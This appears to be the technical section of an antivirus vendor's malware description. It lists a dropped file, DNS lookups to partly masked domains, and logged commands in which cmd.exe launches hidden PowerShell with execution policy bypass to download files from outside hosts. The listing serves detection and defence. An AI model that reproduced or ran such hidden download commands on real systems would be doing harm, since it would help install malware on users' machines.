Technical Information
- %LOCALAPPDATA%\templgd15.jpg
- '1.##.#logspot.com':80
- DNS ASK 1.##.#logspot.com
- DNS ASK fo####.#ationalistworld.com
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -noprofile -executionpolicy bypass $OE = New-Object System.Net.WebClient; $OE.Headers['User-Agent'] = 'ileStoreID4'; $OE.downloadfile('https://forget.nationalistworl...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -noprofile -executionpolicy bypass $OE = New-Object System.Net.WebClient; $OE.Headers['User-Agent'] = 'ileStoreID4'; $OE.downloadfile('http://1.##.#logspot.com/-Oq4H...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -noprofile -executionpolicy bypass $OE = New-Object System.Net.WebClient; $OE.Headers['User-Agent'] = 'ileStoreID4'; $OE.downloadfile('https://forget.nationalistworl...
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -noprofile -executionpolicy bypass $OE = New-Object System.Net.WebClient; $OE.Headers['User-Agent'] = 'ileStoreID4'; $OE.downloadfile('http://1.##.#logspot.com/-Oq4H...